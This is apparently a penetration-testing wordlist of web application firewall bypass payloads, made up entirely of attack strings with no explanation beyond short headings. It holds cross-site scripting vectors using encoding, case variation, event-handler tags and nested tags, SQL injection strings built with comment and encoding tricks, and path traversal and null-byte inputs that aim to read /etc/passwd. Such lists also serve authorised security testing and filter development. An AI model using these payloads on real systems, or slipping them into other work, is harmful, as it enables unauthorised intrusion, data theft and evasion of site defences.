# WAF Bypass Payloads — encoding, obfuscation, and evasion techniques
# XSS bypasses — URL encoding
%3Cscript%3Ealert(1)%3C/script%3E
%253Cscript%253Ealert(1)%253C%252Fscript%253E
# XSS bypasses — case variation
<ScRiPt>alert(1)</ScRiPt>
<sCrIpT>alert(1)</sCrIpT>
# XSS bypasses — tag alternatives
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<body onload=alert(1)>
<marquee onstart=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
# XSS bypasses — template literals and encoding
<script>alert`1`</script>
\u003cscript\u003ealert(1)\u003c/script\u003e
<script>alert(String.fromCharCode(88,83,83))</script>
# XSS bypasses — nested/broken tags
<scr<script>ipt>alert(1)</scr</script>ipt>
<<script>alert(1)//<</script>
# SQLi bypasses — comment injection
' OR/**/1=1--
' /*!OR*/ 1=1--
'/**/OR/**/1=1--
# SQLi bypasses — URL encoding
'%20OR%201=1--
'%09OR%091=1--
# SQLi bypasses — case variation
' oR 1=1--
' Or 1=1--
# SQLi bypasses — alternate syntax
' || 1=1--
' && 1=1--
'+(1)+(1)--
# Path traversal bypasses
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8fetc/passwd
# Null byte injection
%00../../etc/passwd
test%00.jpg
# Unicode normalization
＜script＞alert(1)＜/script＞
# Chunked encoding trick
' O\r\nR 1=1--
# Double encoding
%2527%20OR%201%3D1--
# Comment-based WAF bypass for SQL
'--/**/OR/**/1=1--
';%00OR 1=1--
